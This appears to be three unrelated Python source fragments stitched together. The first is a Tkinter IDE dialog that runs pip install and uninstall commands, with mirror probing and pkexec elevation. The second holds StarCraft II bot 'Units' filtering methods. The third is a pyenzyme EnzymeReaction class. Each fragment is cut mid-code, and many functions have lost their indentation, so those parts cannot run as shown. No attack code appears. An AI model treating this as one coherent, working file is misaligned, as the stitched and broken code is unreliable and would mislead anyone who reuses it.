        self._pipSourceCombo = ttk.Combobox(row, values=self.SOURCE_NAME_LIST,state="readonly")
        self._pipSourceCombo.current(0)
        self._pipSourceCombo.pack(side=tk.LEFT,pady=(consts.DEFAUT_CONTRL_PAD_Y,0),fill="x",expand=1)
        self.check_source_btn = ttk.Button(row, text= _("Check the best source"),command=self.CheckTheBestSource)
        self.check_source_btn.pack(side=tk.LEFT,pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=(consts.DEFAUT_CONTRL_PAD_X,0))
        row.grid(row=0,column=0,padx=consts.DEFAUT_CONTRL_PAD_X,sticky=tk.EW,)
        self.CreateWidgets(1,_("We will download and install it in the interpreter:"),\
            _("Type the name of package or args to install:"),_("To install the specific version,type \"xxx==1.0.1\"\nTo install more packages,please specific the path of requirements.txt"))
        check_best_source = True
        pip_source = self.BEST_PIP_SOURCE
        if utils.profile_get_int("RemberPipsource", True):
            pip_source_path = self.GetPipsourcePath()
            # Read the previously saved pip source; no need to probe for the best one
            if os.path.exists(pip_source_path):
                check_best_source = False
                with open(pip_source_path) as f:
                    pip_source = f.read().strip()
        if self.BEST_PIP_SOURCE is None and check_best_source:
            self.CheckBestPipSource()
        else:
            self.SelectPipSource(pip_source)
        self.auto_run()
    def InstallPackage(self,interpreter):
        '''Build the pip install command line and run it on a worker thread.'''
        install_args = self.args_var.get().strip()
        command = strutils.emphasis_path(interpreter.GetPipPath()) + " install %s" % (install_args)
        # On Linux, installing a package may require root privileges
        if not sysutils.is_windows():
            # With '--user' the package goes under $HOME, so root is not needed
            root = False if '--user ' in install_args else True
            if root:
                # pkexec prompts the user for root privileges
                command = "pkexec " + command
        if self.SOURCE_NAME_LIST[self._pipSourceCombo.current()] != self.SOURCE_NAME_LIST[0]:
            command += " -i " + self.SOURCE_LIST[self._pipSourceCombo.current()]
            host = url_parse_host(self.SOURCE_LIST[self._pipSourceCombo.current()])
            command += " --trusted-host " + host
        utils.get_logger().info("install command is %s",command)
        self.AppendText(command + os.linesep)
        self.call_back = self.AppendText
        t = threading.Thread(target=self.ExecCommandAndOutput,args=(command,self))
        t.start()
    def CheckBestPipSource(self):
        '''Probe the mirrors for the fastest one on a background thread.'''
        t = threading.Thread(target=self.GetBestPipSource)
        t.start()
    def GetBestPipSource(self):
        '''Time a request against every mirror and select the fastest responder.'''
        self.AppendText(_("Checking the best pip source...\n"))
        self.EnableCheckSourcButton(False)
        sort_pip_source_dct = {}
        for i,pip_source_name in enumerate(self.SOURCE_NAME_LIST):
            pip_source = self.SOURCE_LIST[i]
            api_addr = pip_source + "/ok"
            start = time.time()
            if urlutils.RequestData(api_addr,timeout=10,to_json=False):
                end = time.time()
                elapse = end - start
                sort_pip_source_dct[pip_source] = elapse
                utils.get_logger().debug("response time of pip source %s is %.2fs",pip_source,elapse)
        if len(sort_pip_source_dct) == 0:
            self.AppendText(_("Could not get the best pip source...\n"))
            return
        best_source,elapse = sorted(sort_pip_source_dct.items(),key = lambda x:x[1],reverse = False)[0]
        utils.get_logger().info("the best pip source is %s,response time is %.2fs",best_source,elapse)
        self.AppendText(_("the best pip source is %s\n")%best_source)
        InstallPackagesDialog.BEST_PIP_SOURCE = best_source
        self.SelectPipSource(self.BEST_PIP_SOURCE)
        self.EnableCheckSourcButton(True)
        self.auto_run()
    @ui_utils.capture_tclerror
    def SelectPipSource(self,pip_source_url=None):
        '''Re-label the combobox to flag the best mirror and select pip_source_url.'''
        index = -1
        values = list(self._pipSourceCombo['values'])
        # Remove the previous "best source" marker from the option labels
        for i,value in enumerate(values):
            if value.find(_("The Best Source")) != -1:
                values.remove(value)
                values.insert(i,self.SOURCE_NAME_LIST[i])
                break
        # Tag the new best source in its label
        for i,pip_source in enumerate(self.SOURCE_LIST):
            if pip_source == self.BEST_PIP_SOURCE:
                best_source_name = self.SOURCE_NAME_LIST[i] + "(" + _("The Best Source") + ")"
                values.remove(self.SOURCE_NAME_LIST[i])
                values.insert(i,best_source_name)
                break
        # Select the source that should be displayed
        for i,pip_source in enumerate(self.SOURCE_LIST):
            if pip_source == pip_source_url:
                index = i
                break
        self._pipSourceCombo['values'] = tuple(values)
        if index != -1:
            self._pipSourceCombo.current(index)
    def CheckTheBestSource(self):
        '''Button handler: re-run the best-mirror probe.'''
        self.CheckBestPipSource()
    @ui_utils.capture_tclerror
    def EnableCheckSourcButton(self,enable=True):
        '''Toggle the "check best source" button while a probe is running.'''
        if enable:
            self.check_source_btn['state'] = "normal"
            self.check_source_btn.configure(text=_("Check the best source"))
        else:
            self.check_source_btn.configure(text=_("Checking the best source"))
            self.check_source_btn['state'] = tk.DISABLED
    def EndDialog(self,retcode):
        '''Handle pip completion: verify the install, notify the user, close on success.'''
        pkg_name = self.GetPackageName()
        install_suc = False
        utils.get_logger().debug('install ret code is %d',retcode)
        if retcode == 0:
            if pkg_name:
                # Check whether the package is now present in the interpreter
                python_package = self.interpreter.GetInstallPackage(pkg_name)
                # If the package exists, the installation succeeded
                install_suc = True if python_package else False
            # The user supplied free-form install arguments
            else:
                python_package = None
                self.interpreter.LoadPackages(self.master,True)
                install_suc = True
        if install_suc:
            # Run the callback only when the installation succeeded
            if self.end_callback:
                self.end_callback(python_package,self.interpreter)
            if self.install_update:
                messagebox.showinfo(GetApp().GetAppName(),_("Update Success"),parent=self)
            else:
                messagebox.showinfo(GetApp().GetAppName(),_("Install Success"),parent=self)
            self.destroy()
        else:
            if self.install_update:
                messagebox.showerror(GetApp().GetAppName(),_("Update Fail"),parent=self)
            else:
                messagebox.showerror(GetApp().GetAppName(),_("Install Fail"),parent=self)
            self.EnableButton()
    def run(self):
        '''Start the installation on the currently selected interpreter.'''
        self.InstallPackage(self.interpreter)
    def GetPipsourcePath(self):
        '''Return the cache-file path where the chosen pip source is persisted.'''
        cache_path = utils.get_cache_path()
        pip_source_path = os.path.join(cache_path,"pip_source.txt")
        return pip_source_path
    def _ok(self,event=None):
        '''Validate, persist the pip source, resolve reinstall/update choice, then run.'''
        if not CommonManagePackagesDialog._ok(self):
            return False
        # Persist the selected pip source
        if utils.profile_get_int("RemberPipsource",True):
            pip_source_path = self.GetPipsourcePath()
            with open(pip_source_path,"w") as f:
                f.write(self.SOURCE_LIST[self._pipSourceCombo.current()])
        pkg_name = self.GetPackageName()
        if pkg_name:
            # If the package is already installed, ask the user which action to take
            python_package = self.interpreter.GetInstallPackage(pkg_name)
            if python_package:
                choice_dlg = PackageActionChoiceDialog(self,pkg_name)
                if constants.ID_OK == choice_dlg.ShowModal():
                    choice = choice_dlg.choice_chkvar.get()
                    if choice != PackageActionChoiceDialog.REINSTALL:
                        self.install_update = True
                        # The user chose to install the latest version
                        if choice == PackageActionChoiceDialog.UPDATE_LATEST:
                            # pip argument to update to the latest version
                            self.args_var.set("-U %s"%pkg_name)
                        # The user chose to install a specific version
                        else:
                            versions = get_package_versions(pkg_name)
                            if not versions:
                                self.EnableButton()
                                return False
                            specified_dlg = ui_base.SingleChoiceDialog(self,_("Choose the specified version"),_("Please choose the specified version to install:"),versions,show_scrollbar=True)
                            if constants.ID_OK == specified_dlg.ShowModal():
                                install_version = specified_dlg.selection
                                # pip argument to install the pinned version
                                self.args_var.set("%s==%s"%(pkg_name,install_version))
                            else:
                                self.EnableButton()
                                return False
                else:
                    self.EnableButton()
                    return False
        self.run()
    def SetRequirementsArgs(self,path):
        '''
        Set pip arguments to batch-install packages from a requirements.txt file.
        '''
        args = "-r "
        # For non-virtualenv interpreters install with --user
        if not self.interpreter.IsVirtual():
            args = "--user " + args
        self.args_var.set(args + fileutils.opj(path))
class UninstallPackagesDialog(CommonManagePackagesDialog):
    def __init__(self,parent,interpreter,interpreters=interpretermanager.InterpreterManager().interpreters,pkg_name='',uninstall_args='',\
            autorun=False,call_back=None):
        '''
        NOTE(review): the `interpreters` default is evaluated once at class
        definition time (mutable default argument) — confirm that
        InterpreterManager is a singleton whose interpreter list stays current.
        '''
        CommonManagePackagesDialog.__init__(self,parent,_("Uninstall Package"),interpreter,interpreters,pkg_name,uninstall_args,autorun,call_back)
        self.CreateWidgets(0,_("We will uninstall it in the interpreter:"),\
            _("Type the name of package or args to uninstall:"), _("To uninstall more packages,please specific the path of requirements.txt"))
        self.auto_run()
    def EndDialog(self,retcode):
        '''Handle pip completion: verify the uninstall, notify the user, close on success.'''
        pkg_name = self.GetPackageName()
        uninstall_suc = False
        if retcode == 0:
            if pkg_name:
                # If the package is gone from the interpreter, the uninstall succeeded
                python_package = self.interpreter.GetInstallPackage(pkg_name)
                uninstall_suc = False if python_package else True
            else:
                self.interpreter.LoadPackages(self.master,True)
                uninstall_suc = True
        if uninstall_suc:
            # Run the callback only when the uninstall succeeded
            if self.end_callback:
                self.end_callback(pkg_name,self.interpreter)
            messagebox.showinfo(GetApp().GetAppName(),_("Uninstall Success"),parent=self)
            self.destroy()
        else:
            messagebox.showerror(GetApp().GetAppName(),_("Uninstall Fail"),parent=self)
            self.EnableButton()
def UninstallPackage(self,interpreter):
uninstall_args = self.args_var.get().strip()
command = strutils.emphasis_path(interpreter.GetPipPath()) + " uninstall -y %s" % (uninstall_args)
pkg_name = self.GetPackageName()
python_package = self.interpreter.GetInstallPackage(pkg_name)
#linux系统卸载包可能需要root权限
if not sysutils.is_windows():
root = False
if python_package:
pkg_location = python_package.Location
if pkg_location is not None:
#判断包安装目录是否有当前用户写的权限,如果有则不需要root,否则需要root
root = not fileutils.is_writable(pkg_location)
if root:
#这里是提示root权限
command = "pkexec " + command
| |
position: Union[Unit, Point2], n: int) -> Units:
"""
Returns the n closest units in distance to position.
Example::
enemy_zerglings = self.enemy_units(UnitTypeId.ZERGLING)
my_marine = next((unit for unit in self.units if unit.type_id == UnitTypeId.MARINE), None)
if my_marine:
zerglings_filtered = enemy_zerglings.closest_n_units(my_marine, 5)
# Contains 5 zerglings that are the closest to the marine
:param position:
:param n:
"""
assert self, "Units object is empty"
return self.subgroup(self._list_sorted_by_distance_to(position)[:n])
    def furthest_n_units(self, position: Union[Unit, Point2, np.ndarray], n: int) -> Units:
        """
        Returns the n furthest units in distance to position.
        Example::
            enemy_zerglings = self.enemy_units(UnitTypeId.ZERGLING)
            my_marine = next((unit for unit in self.units if unit.type_id == UnitTypeId.MARINE), None)
            if my_marine:
                zerglings_filtered = enemy_zerglings.furthest_n_units(my_marine, 5)
                # Contains 5 zerglings that are the furthest to the marine
        :param position: point (or unit) to measure distances from
        :param n: number of units to return
        """
        assert self, "Units object is empty"
        return self.subgroup(self._list_sorted_by_distance_to(position)[-n:])
def in_distance_of_group(self, other_units: Units, distance: float) -> Units:
""" Returns units that are closer than distance from any unit in the other units object.
:param other_units:
:param distance:
"""
assert other_units, "Other units object is empty"
# Return self because there are no enemies
if not self:
return self
distance_squared = distance ** 2
if len(self) == 1:
if any(
self._bot_object._distance_squared_unit_to_unit(self[0], target) < distance_squared
for target in other_units
):
return self
else:
return self.subgroup([])
return self.subgroup(
self_unit
for self_unit in self
if any(
self._bot_object._distance_squared_unit_to_unit(self_unit, other_unit) < distance_squared
for other_unit in other_units
)
)
def in_closest_distance_to_group(self, other_units: Units) -> Unit:
"""
Returns unit in shortest distance from any unit in self to any unit in group.
Loops over all units in self, then loops over all units in other_units and calculates the shortest distance. Returns the units that is closest to any unit of 'other_units'.
:param other_units: """
assert self, "Units object is empty"
assert other_units, "Given units object is empty"
return min(
self,
key=lambda self_unit: min(
self._bot_object._distance_squared_unit_to_unit(self_unit, other_unit) for other_unit in other_units
),
)
def _list_sorted_closest_to_distance(self, position: Union[Unit, Point2], distance: float) -> List[Unit]:
""" This function should be a bit faster than using units.sorted(key=lambda u: u.distance_to(position)) """
if isinstance(position, Unit):
return sorted(
self,
key=lambda unit: abs(self._bot_object._distance_squared_unit_to_unit(unit, position) - distance),
reverse=True,
)
distances = self._bot_object._distance_units_to_pos(self, position)
unit_dist_dict = {unit.tag: dist for unit, dist in zip(self, distances)}
return sorted(self, key=lambda unit2: abs(unit_dist_dict[unit2.tag] - distance), reverse=True)
    def n_closest_to_distance(self, position: Union[Point2, np.ndarray], distance: Union[int, float], n: int) -> Units:
        """ Returns n units that are the closest to distance away.
        For example if the distance is set to 5 and you want 3 units, from units with distance [3, 4, 5, 6, 7] to position,
        the units with distance [4, 5, 6] will be returned
        :param position: point to measure distances from
        :param distance: target distance to match
        :param n: number of units to return """
        return self.subgroup(self._list_sorted_closest_to_distance(position=position, distance=distance)[:n])
    def n_furthest_to_distance(self, position: Union[Point2, np.ndarray], distance: Union[int, float], n: int) -> Units:
        """ Inverse of the function 'n_closest_to_distance', returns the furthest units instead
        :param position: point to measure distances from
        :param distance: target distance to match
        :param n: number of units to return """
        return self.subgroup(self._list_sorted_closest_to_distance(position=position, distance=distance)[-n:])
    def subgroup(self, units):
        """
        Creates a new mutable Units object from Units or list object.
        Shares this object's bot reference with the new group.
        :param units: iterable of Unit objects """
        return Units(units, self._bot_object)
def filter(self, pred: callable) -> Units:
"""
Filters the current Units object and returns a new Units object.
Example::
from sc2.ids.unit_typeid import UnitTypeId
my_marines = self.units.filter(lambda unit: unit.type_id == UnitTypeId.MARINE)
completed_structures = self.structures.filter(lambda structure: structure.is_ready)
queens_with_energy_to_inject = self.units.filter(lambda unit: unit.type_id == UnitTypeId.QUEEN and unit.energy >= 25)
orbitals_with_energy_to_mule = self.structures.filter(lambda structure: structure.type_id == UnitTypeId.ORBITALCOMMAND and structure.energy >= 50)
my_units_that_can_shoot_up = self.units.filter(lambda unit: unit.can_attack_air)
See more unit properties in unit.py
:param pred:
"""
assert callable(pred), "Function is not callable"
return self.subgroup(filter(pred, self))
    def sorted(self, key: callable, reverse: bool = False) -> Units:
        """ Returns a new Units object with the units sorted by `key`.
        :param key: sort key called once per unit
        :param reverse: sort descending when True """
        return self.subgroup(sorted(self, key=key, reverse=reverse))
    def _list_sorted_by_distance_to(self, position: Union[Unit, Point2], reverse: bool = False) -> List[Unit]:
        """ This function should be a bit faster than using units.sorted(key=lambda u: u.distance_to(position))
        :param position: unit or point to measure distances from
        :param reverse: sort descending when True """
        if isinstance(position, Unit):
            # Squared distances preserve the ordering, so no sqrt is needed
            return sorted(
                self, key=lambda unit: self._bot_object._distance_squared_unit_to_unit(unit, position), reverse=reverse
            )
        # Batch-compute distances once, then sort by a tag -> distance lookup
        distances = self._bot_object._distance_units_to_pos(self, position)
        unit_dist_dict = {unit.tag: dist for unit, dist in zip(self, distances)}
        return sorted(self, key=lambda unit2: unit_dist_dict[unit2.tag], reverse=reverse)
    def sorted_by_distance_to(self, position: Union[Unit, Point2], reverse: bool = False) -> Units:
        """ This function should be a bit faster than using units.sorted(key=lambda u: u.distance_to(position))
        :param position: unit or point to measure distances from
        :param reverse: sort descending when True """
        return self.subgroup(self._list_sorted_by_distance_to(position, reverse=reverse))
    def tags_in(self, other: Union[Set[int], List[int], Dict[int, Any]]) -> Units:
        """ Filters all units that have their tags in the 'other' set/list/dict
        Example::
            my_inject_queens = self.units.tags_in(self.queen_tags_assigned_to_do_injects)
            # Do not use the following as it is slower because it first loops over all units to filter out if they are queens and loops over those again to check if their tags are in the list/set
            my_inject_queens_slow = self.units(QUEEN).tags_in(self.queen_tags_assigned_to_do_injects)
        :param other: container of unit tags to keep
        """
        return self.filter(lambda unit: unit.tag in other)
    def tags_not_in(self, other: Union[Set[int], List[int], Dict[int, Any]]) -> Units:
        """
        Filters all units that have their tags not in the 'other' set/list/dict
        Example::
            my_non_inject_queens = self.units.tags_not_in(self.queen_tags_assigned_to_do_injects)
            # Do not use the following as it is slower because it first loops over all units to filter out if they are queens and loops over those again to check if their tags are in the list/set
            my_non_inject_queens_slow = self.units(QUEEN).tags_not_in(self.queen_tags_assigned_to_do_injects)
        :param other: container of unit tags to exclude
        """
        return self.filter(lambda unit: unit.tag not in other)
def of_type(self, other: Union[UnitTypeId, Set[UnitTypeId], List[UnitTypeId], Dict[UnitTypeId, Any]]) -> Units:
"""
Filters all units that are of a specific type
Example::
# Use a set instead of lists in the argument
some_attack_units = self.units.of_type({ZERGLING, ROACH, HYDRALISK, BROODLORD})
:param other: """
if isinstance(other, UnitTypeId):
other = {other}
elif isinstance(other, list):
other = set(other)
return self.filter(lambda unit: unit.type_id in other)
def exclude_type(self, other: Union[UnitTypeId, Set[UnitTypeId], List[UnitTypeId], Dict[UnitTypeId, Any]]) -> Units:
"""
Filters all units that are not of a specific type
Example::
# Use a set instead of lists in the argument
ignore_units = self.enemy_units.exclude_type({LARVA, EGG, OVERLORD})
:param other: """
if isinstance(other, UnitTypeId):
other = {other}
elif isinstance(other, list):
other = set(other)
return self.filter(lambda unit: unit.type_id not in other)
    def same_tech(self, other: Set[UnitTypeId]) -> Units:
        """
        Returns all structures that have the same base structure.
        Untested: This should return the equivalents for WarpPrism, Observer, Overseer, SupplyDepot and others
        Example::
            # All command centers, flying command centers, orbital commands, flying orbital commands, planetary fortress
            terran_townhalls = self.townhalls.same_tech({UnitTypeId.COMMANDCENTER})
            # All hatcheries, lairs and hives
            zerg_townhalls = self.townhalls.same_tech({UnitTypeId.HATCHERY})
            # All spires and greater spires
            spires = self.townhalls.same_tech({UnitTypeId.SPIRE})
            # The following returns the same
            spires = self.townhalls.same_tech({UnitTypeId.GREATERSPIRE})
            # This also works with multiple unit types
            zerg_townhalls_and_spires = self.structures.same_tech({UnitTypeId.HATCHERY, UnitTypeId.SPIRE})
        :param other: set of UnitTypeId values (a set is required by the assert below)
        """
        assert isinstance(other, set), (
            f"Please use a set as this filter function is already fairly slow. For example"
            + " 'self.units.same_tech({UnitTypeId.LAIR})'"
        )
        # Seed with the raw proto values of the requested types, then add
        # every tech alias declared in the game data for those types
        tech_alias_types: Set[int] = {u.value for u in other}
        unit_data = self._bot_object._game_data.units
        for unitType in other:
            for same in unit_data[unitType.value]._proto.tech_alias:
                tech_alias_types.add(same)
        # Keep units whose own type or any of their tech aliases is in the set
        return self.filter(
            lambda unit: unit._proto.unit_type in tech_alias_types
            or any(same in tech_alias_types for same in unit._type_data._proto.tech_alias)
        )
    def same_unit(self, other: Union[UnitTypeId, Set[UnitTypeId], List[UnitTypeId], Dict[UnitTypeId, Any]]) -> Units:
        """
        Returns all units that have the same base unit while being in different modes.
        Untested: This should return the equivalents for WarpPrism, Observer, Overseer, SupplyDepot and other units that have different modes but still act as the same unit
        Example::
            # All command centers on the ground and flying
            ccs = self.townhalls.same_unit(UnitTypeId.COMMANDCENTER)
            # All orbital commands on the ground and flying
            ocs = self.townhalls.same_unit(UnitTypeId.ORBITALCOMMAND)
            # All roaches and burrowed roaches
            roaches = self.units.same_unit(UnitTypeId.ROACH)
            # This is useful because roach has a different type id when burrowed
            burrowed_roaches = self.units(UnitTypeId.ROACHBURROWED)
        :param other: single UnitTypeId or a collection of them
        """
        if isinstance(other, UnitTypeId):
            other = {other}
        # Seed with the raw proto values, then add each type's unit alias
        unit_alias_types: Set[int] = {u.value for u in other}
        unit_data = self._bot_object._game_data.units
        for unitType in other:
            unit_alias_types.add(unit_data[unitType.value]._proto.unit_alias)
        # 0 means "no alias" in the proto; it must not match anything
        unit_alias_types.discard(0)
        return self.filter(
            lambda unit: unit._proto.unit_type in unit_alias_types
            or unit._type_data._proto.unit_alias in unit_alias_types
        )
@property
def center(self) -> Point2:
""" Returns the central position of all units. """
assert self, f"Units object is empty"
amount = self.amount
return Point2(
(
sum(unit.position_tuple[0] for unit in self) / amount,
sum(unit.position_tuple[1] for unit in self) / amount,
)
)
    @property
    def selected(self) -> Units:
        """ Returns all units that are selected by the human player. """
        return self.filter(lambda unit: unit.is_selected)
@property
def tags(self) -> Set[int]:
""" Returns all unit tags as a | |
'''
Created on 09.06.2020
@author: JR
'''
from pyenzyme.enzymeml.core.functionalities import TypeChecker
from pyenzyme.enzymeml.models.kineticmodel import KineticModel
from pyenzyme.enzymeml.core.replicate import Replicate
import pandas as pd
from copy import deepcopy
class EnzymeReaction(object):
    def __init__(self, temperature, tempunit, ph, name, reversible, educts=None, products=None, modifiers=None):
        '''
        Class to describe an enzyme reaction, its molecules/proteins, data and models
        Args:
            temperature: Numerical value for temperature
            tempunit: Unit for temperature
            ph: pH value [0-14]
            name: Enzyme Reaction Name
            reversible: Is Reversible bool
            educts: List of tuples ( Reactant ID, Stoichiometry, Constant?, List Of Replicates )
            products: List of tuples ( Reactant ID, Stoichiometry, Constant?, List Of Replicates )
            modifiers: List of tuples ( Reactant ID, Stoichiometry, Constant?, List Of Replicates )
        '''
        # All attributes are assigned through setters (defined outside this
        # view; presumably they run TypeChecker validation — confirm)
        self.setTemperature(temperature)
        self.setTempunit(tempunit)
        self.setPh(ph)
        self.setName(name)
        self.setReversible(reversible)
        self.setEducts(educts)
        self.setProducts(products)
        self.setModifiers(modifiers)
def __setInitConc(self, conc, reactant, enzmldoc):
conc_tup = (conc, enzmldoc.getReactant(reactant).getSubstanceunits())
if conc_tup not in enzmldoc.getConcDict().values():
index = 0
while True:
id_ = "c%i" % index
if id_ not in enzmldoc.getConcDict().keys():
enzmldoc.getConcDict()[ id_ ] = conc_tup
return id_
index += 1
else:
return [ key for key, item in enzmldoc.getConcDict().items() if conc_tup == item ][0]
def exportReplicates(self, ids):
'''
Returns replicate data of given ID(s) as a pandas DataFrame.
Args:
String/ListStr ids: Single or multiple IDs of reactants/proteins
'''
ids = deepcopy(ids)
if type(ids) == str:
ids = [ids]
repls = []
all_tups = self.__educts + self.__products + self.__modifiers
for tup in all_tups:
if tup[0].split('_')[0] in ids:
repls += [ repl.getData() for repl in tup[3] ]
ids.remove(tup[0].split('_')[0])
if len(ids) > 0:
print('\nCould not find ', ids, '\n' )
return pd.DataFrame( repls ).T
def getEduct(self, id_):
'''
Returns educt tuple ( ID, Stoichiometry, IsConstant, Replicates )
Args:
String id_: Reactant internal ID
'''
for tup in self.__educts:
if tup[0] == id_:
return tup
raise KeyError( "Reactant %s not defined in educts" % id_ )
def getProduct(self, id_):
'''
Returns product tuple ( ID, Stoichiometry, IsConstant, Replicates )
Args:
String id_: Reactant internal ID
'''
for tup in self.__products:
if tup[0] == id_:
return tup
raise KeyError( "Reactant %s not defined in products" % id_ )
def getModifier(self, id_):
'''
Returns modifier tuple ( ID, Stoichiometry, IsConstant, Replicates )
Args:
String id_: Reactant/Protein internal ID
'''
for tup in self.__modifiers:
if tup[0] == id_:
return tup
raise KeyError( "Reactant/Protein %s not defined in modifiers" % id_ )
def addReplicate(self, replicate, enzmldoc):
    """
    Attach a Replicate object to the species it belongs to.

    The replicate's initial concentration is replaced by a document-wide
    "c<N>" identifier, then the replicate is appended to the matching
    educt/product/modifier tuple.

    Args:
        Replicate replicate: Object describing an EnzymeML replicate.
        EnzymeMLDocument enzmldoc: Document used to resolve units and
            shared concentration identifiers.

    Returns:
        int: 1 on success.

    Raises:
        AttributeError: If the replicate has no series data or its
            reactant is not part of this reaction.
    """
    # Turn the initial concentration into a shared "c<N>" identifier
    try:
        # Reuse an existing identifier for this (value, unit) pair, if any.
        init_conc_tup = ( replicate.getInitConc(), enzmldoc.getReactant( replicate.getReactant() ).getSubstanceunits() )
        inv_conc = { item: key for key, item in enzmldoc.getConcDict().items() }
        replicate.setInitConc( inv_conc[ init_conc_tup ] )
    except KeyError:
        # Unknown pair: allocate the lowest free "c<N>" key and register it.
        index = 0
        init_conc_tup = ( replicate.getInitConc(), enzmldoc.getReactant( replicate.getReactant() ).getSubstanceunits() )
        while True:
            id_ = "c%i" % index
            if id_ not in enzmldoc.getConcDict().keys():
                enzmldoc.getConcDict()[ id_ ] = init_conc_tup
                replicate.setInitConc(id_)
                break
            else:
                index += 1
    # Replicates without series data cannot be exported later; fail early.
    try:
        replicate.getData()
    except AttributeError:
        raise AttributeError( "Replicate has no series data. Add data via replicate.setData( pandas.Series )" )
    # Append the replicate to whichever species list holds its reactant;
    # tuple layout is (ID, stoichiometry, constant, replicates, ...).
    for i in range(len(self.__educts)):
        if self.__educts[i][0] == replicate.getReactant():
            self.__educts[i][3].append(replicate)
            return 1
    for i in range(len(self.__products)):
        if self.__products[i][0] == replicate.getReactant():
            self.__products[i][3].append(replicate)
            return 1
    for i in range(len(self.__modifiers)):
        if self.__modifiers[i][0] == replicate.getReactant():
            self.__modifiers[i][3].append(replicate)
            return 1
    raise AttributeError( "Replicate's reactant %s not defined in reaction" % (replicate.getReactant()) )
def addEduct(self, id_, stoichiometry, constant, enzmldoc, replicates=None, init_concs=None):
    """
    Adds an educt to the EnzymeReaction object. Replicates are not mandatory
    and can be left empty if no data is given. The EnzymeMLDocument has to be
    given to check for un-defined entities; these should be added to the
    document before a reaction is constructed.

    Args:
        String id_: Reactant internal ID
        Float stoichiometry: Can also be given as an integer
        Boolean constant: Sets if reactant is either constant or not
        EnzymeMLDocument enzmldoc: Object describing an entire EnzymeML file
        Replicate replicates: Single Replicate or a list of Replicates
        init_concs: Initial concentration values registered in the document

    Raises:
        KeyError: If the reactant ID is not yet defined in the document.
    """
    id_ = TypeChecker(id_, str)
    if id_ not in list(enzmldoc.getReactantDict().keys()):
        raise KeyError( "Reactant with id %s is not defined yet" % id_ )
    stoichiometry = TypeChecker( float(stoichiometry) , float)
    constant = TypeChecker(constant, bool)
    # Fix: the defaults used to be shared mutable [] objects. addReplicate()
    # appends into the stored replicate list, so the shared default leaked
    # replicates between reactions. Normalize None / single Replicate to a
    # fresh list instead.
    if replicates is None:
        replicates = []
    elif type(replicates) == Replicate:
        replicates = [replicates]
    if init_concs is None:
        init_concs = []
    # replace concentrations with identifiers
    init_concs = [ self.__setInitConc(conc, id_, enzmldoc) for conc in init_concs ]
    self.__educts.append(
        (
            id_,
            stoichiometry,
            constant,
            replicates,
            init_concs
        )
    )
def addProduct(self, id_, stoichiometry, constant, enzmldoc, replicates=None, init_concs=None):
    """
    Adds a product to the EnzymeReaction object. Replicates are not mandatory
    and can be left empty if no data is given. The EnzymeMLDocument has to be
    given to check for un-defined entities; these should be added to the
    document before a reaction is constructed.

    Args:
        String id_: Reactant internal ID
        Float stoichiometry: Can also be given as an integer
        Boolean constant: Sets if reactant is either constant or not
        EnzymeMLDocument enzmldoc: Object describing an entire EnzymeML file
        Replicate replicates: Single Replicate or a list of Replicates
        init_concs: Initial concentration values registered in the document

    Raises:
        KeyError: If the reactant ID is not yet defined in the document.
    """
    id_ = TypeChecker(id_, str)
    if id_ not in list(enzmldoc.getReactantDict().keys()):
        raise KeyError( "Reactant with id %s is not defined yet" % id_ )
    stoichiometry = TypeChecker( float(stoichiometry) , float)
    constant = TypeChecker(constant, bool)
    # Fix: the defaults used to be shared mutable [] objects. addReplicate()
    # appends into the stored replicate list, so the shared default leaked
    # replicates between reactions. Normalize None / single Replicate to a
    # fresh list instead.
    if replicates is None:
        replicates = []
    elif type(replicates) == Replicate:
        replicates = [replicates]
    if init_concs is None:
        init_concs = []
    # replace concentrations with identifiers
    init_concs = [ self.__setInitConc(conc, id_, enzmldoc) for conc in init_concs ]
    self.__products.append(
        (
            id_,
            stoichiometry,
            constant,
            replicates,
            init_concs
        )
    )
def addModifier(self, id_, stoichiometry, constant, enzmldoc, replicates=None, init_concs=None):
    """
    Adds a modifier (reactant or protein) to the EnzymeReaction object.
    Replicates are not mandatory and can be left empty if no data is given.
    The EnzymeMLDocument has to be given to check for un-defined entities;
    these should be added to the document before a reaction is constructed.

    Args:
        String id_: Reactant/Protein internal ID
        Float stoichiometry: Can also be given as an integer
        Boolean constant: Sets if the species is either constant or not
        EnzymeMLDocument enzmldoc: Object describing an entire EnzymeML file
        Replicate replicates: Single Replicate or a list of Replicates
        init_concs: Initial concentration values registered in the document

    Raises:
        KeyError: If the ID is neither a defined reactant nor protein.
    """
    id_ = TypeChecker(id_, str)
    # Modifiers may be reactants or proteins, so check both dictionaries.
    if id_ not in list(enzmldoc.getReactantDict().keys()) + list(enzmldoc.getProteinDict().keys()) :
        raise KeyError( "Reactant/Protein with id %s is not defined yet" % id_ )
    stoichiometry = TypeChecker( float(stoichiometry) , float)
    constant = TypeChecker(constant, bool)
    # Fix: the defaults used to be shared mutable [] objects. addReplicate()
    # appends into the stored replicate list, so the shared default leaked
    # replicates between reactions. Normalize None / single Replicate to a
    # fresh list instead.
    if replicates is None:
        replicates = []
    elif type(replicates) == Replicate:
        replicates = [replicates]
    if init_concs is None:
        init_concs = []
    # replace concentrations with identifiers
    init_concs = [ self.__setInitConc(conc, id_, enzmldoc) for conc in init_concs ]
    self.__modifiers.append(
        (
            id_,
            stoichiometry,
            constant,
            replicates,
            init_concs
        )
    )
def getTemperature(self):
    """Return the reaction temperature (stored as float by setTemperature)."""
    return self.__temperature

def getTempunit(self):
    """Return the temperature unit string."""
    return self.__tempunit

def getPh(self):
    """Return the reaction pH value."""
    return self.__ph

def getName(self):
    """Return the reaction name."""
    return self.__name

def getReversible(self):
    """Return the reversibility flag (bool)."""
    return self.__reversible

def getId(self):
    """Return the internal reaction identifier (assigned via setId)."""
    return self.__id

def getMetaid(self):
    """Return the meta-identifier ("METAID_<ID>", derived in setId)."""
    return self.__metaid

def getModel(self):
    """Return the attached KineticModel instance."""
    return self.__model

def getEducts(self):
    """Return the list of educt tuples."""
    return self.__educts

def getProducts(self):
    """Return the list of product tuples."""
    return self.__products

def getModifiers(self):
    """Return the list of modifier tuples."""
    return self.__modifiers
def setTemperature(self, temperature):
    """Set the temperature; any float()-convertible value is stored as float."""
    self.__temperature = TypeChecker(float(temperature), float)

def setTempunit(self, tempunit):
    """Set the temperature unit (must be a string)."""
    self.__tempunit = TypeChecker(tempunit, str)
def setPh(self, ph):
    """
    Set the reaction pH after validating it lies in [0, 14].

    Args:
        ph: pH value; any float()-convertible value is accepted.

    Raises:
        ValueError: If the value is outside the range [0-14].
    """
    ph = TypeChecker(float(ph), float)
    if 0 <= ph <= 14:
